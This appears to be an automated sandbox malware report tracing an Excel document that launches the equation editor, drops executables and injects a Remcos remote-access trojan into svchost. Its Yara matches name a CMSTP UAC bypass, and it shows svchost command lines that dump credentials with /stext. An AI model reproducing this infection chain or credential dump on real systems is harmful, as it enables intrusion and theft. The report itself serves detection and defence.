                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/ddljson?async=ntp:2</title>
                                                                                                                                              2024-05-02 02:56:11 UTC1255INData Raw: 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 78 42 57 4a 34 78 44 4a 76 6e 4b 7a 45 32 49 52 49 77 77 72 79 50 69 77 52 67 39
                                                                                                                                              Data Ascii: tCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="xBWJ4xDJvnKzE2IRIwwryPiwRg9
                                                                                                                                              2024-05-02 02:56:11 UTC977INData Raw: 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e
                                                                                                                                              Data Ascii: ears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the mean


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              7192.168.2.2249177172.217.1.44432960C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-05-02 02:56:11 UTC848OUTGET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMqBzLEGIjAmi-UIIFqSTjkw-RfWXi2GfkOK6xdeNQDHNk-OB5e4eww8XVW3FAYyUUV3pTR2uxYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                              Host: www.google.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIlqHLAQiFoM0BCNy9zQEIuMjNAQ==
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: 1P_JAR=2024-05-02-02; NID=513=nQDSKKCUY72nbduCHcRHhXACOPv96Kxy9BGRkfztkyu42Rwrd_gHXoam_RmDAYCnj8eZlKgLn5fWew08N8kSyFNPm8WqA8IlPx75gPq5HjHDBfOIlzDJCalLIF09aVWJgIdxbVFWcdPC2s7k68aYWtAFmlXnyKvJy0ZNSikFz3w
                                                                                                                                              2024-05-02 02:56:11 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                              Date: Thu, 02 May 2024 02:56:11 GMT
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Server: HTTP server (unknown)
                                                                                                                                              Content-Length: 3185
                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Connection: close
                                                                                                                                              2024-05-02 02:56:11 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
                                                                                                                                              2024-05-02 02:56:11 UTC1255INData Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 77 67 41 4f 54 5a 46 44 57
                                                                                                                                              Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="wgAOTZFDW
                                                                                                                                              2024-05-02 02:56:11 UTC1031INData Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74
                                                                                                                                              Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              8192.168.2.2249179172.217.1.44432960C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-05-02 02:56:13 UTC738OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMuBzLEGIjDHkOYETEkfpPO5BNVM4qFB3EzErW1N_BxHwWaZNSSd6fpa03DeWClTlQmn-8-Tj7IyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                              Host: www.google.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: 1P_JAR=2024-05-02-02; NID=513=fgAQ-FMftBn8U6qLB_xWWkkkc9DVEvN_N6o2tEue_K4GUZExVgaPgdzwdYTojqKVxXyKNrqWVPheSLnkhhM1Yn5U2V873JQdGiigIZ_Y-T9zYj0D29_T15mASCX6KaFQVRLJg0wObsmDE1eXTDGt31FHclpLdrGt-svEoASRDdY
                                                                                                                                              2024-05-02 02:56:14 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                              Date: Thu, 02 May 2024 02:56:14 GMT
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Server: HTTP server (unknown)
                                                                                                                                              Content-Length: 3113
                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Connection: close
                                                                                                                                              2024-05-02 02:56:14 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                                                                                                              2024-05-02 02:56:14 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 4c 49 67 33 4b 5a 45 6c 73 31 56 76 79 78 5f 70 2d 30 48 59 71 57 41 72 73 43 6d 62 4b 6a 57 5a 5f
                                                                                                                                              Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="LIg3KZEls1Vvyx_p-0HYqWArsCmbKjWZ_
                                                                                                                                              2024-05-02 02:56:14 UTC959INData Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e
                                                                                                                                              Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


                                                                                                                                              Click to jump to process

                                                                                                                                              Click to jump to process

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Click to jump to process

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:04:54:02
                                                                                                                                              Start date:02/05/2024
                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                              Imagebase:0x13f1f0000
                                                                                                                                              File size:28'253'536 bytes
                                                                                                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:2
                                                                                                                                              Start time:04:54:51
                                                                                                                                              Start date:02/05/2024
                                                                                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:543'304 bytes
                                                                                                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:3
                                                                                                                                              Start time:04:54:52
                                                                                                                                              Start date:02/05/2024
                                                                                                                                              Path:C:\Users\user\AppData\Roaming\YED.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\YED.exe
                                                                                                                                              Imagebase:0x210000
                                                                                                                                              File size:1'402'368 bytes
                                                                                                                                              MD5 hash:9ABB13386C543EB5FEA7DEA95EB86D26
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Antivirus matches:
                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:6
                                                                                                                                              Start time:04:55:55
                                                                                                                                              Start date:02/05/2024
                                                                                                                                              Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                                                                                              Imagebase:0x13f990000
                                                                                                                                              File size:3'151'128 bytes
                                                                                                                                              MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:7
                                                                                                                                              Start time:04:55:57
                                                                                                                                              Start date:02/05/2024
                                                                                                                                              Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1364 --field-trial-handle=1452,i,15568989383610033621,8608539169459799112,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                              Imagebase:0x13f990000
                                                                                                                                              File size:3'151'128 bytes
                                                                                                                                              MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:10
                                                                                                                                              Start time:04:56:02
                                                                                                                                              Start date:02/05/2024
                                                                                                                                              Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                                                                                              Imagebase:0x13f990000
                                                                                                                                              File size:3'151'128 bytes
                                                                                                                                              MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:13
                                                                                                                                              Start time:04:56:03
                                                                                                                                              Start date:02/05/2024
                                                                                                                                              Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=892 --field-trial-handle=1396,i,13358231411772672971,2555512376125685792,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                              Imagebase:0x13f990000
                                                                                                                                              File size:3'151'128 bytes
                                                                                                                                              MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:16
                                                                                                                                              Start time:04:57:08
                                                                                                                                              Start date:02/05/2024
                                                                                                                                              Path:C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\YED.exe
                                                                                                                                              Imagebase:0x1080000
                                                                                                                                              File size:108'357'120 bytes
                                                                                                                                              MD5 hash:A8004A594D5D55F5A5F5ABDBB8001FA9
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                              Antivirus matches:
                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:17
                                                                                                                                              Start time:04:57:09
                                                                                                                                              Start date:02/05/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\YED.exe
                                                                                                                                              Imagebase:0xdf0000
                                                                                                                                              File size:20'992 bytes
                                                                                                                                              MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:20
                                                                                                                                              Start time:04:57:12
                                                                                                                                              Start date:02/05/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\qcbxbnrr"
                                                                                                                                              Imagebase:0xdf0000
                                                                                                                                              File size:20'992 bytes
                                                                                                                                              MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:21
                                                                                                                                              Start time:04:57:12
                                                                                                                                              Start date:02/05/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\seghufctinb"
                                                                                                                                              Imagebase:0xdf0000
                                                                                                                                              File size:20'992 bytes
                                                                                                                                              MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:22
                                                                                                                                              Start time:04:57:12
                                                                                                                                              Start date:02/05/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dyuauqnmwvtskce"
                                                                                                                                              Imagebase:0xdf0000
                                                                                                                                              File size:20'992 bytes
                                                                                                                                              MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:true

                                                                                                                                              Reset < >

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:9.4%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:80.5%
                                                                                                                                                Total number of Nodes:696
                                                                                                                                                Total number of Limit Nodes:3
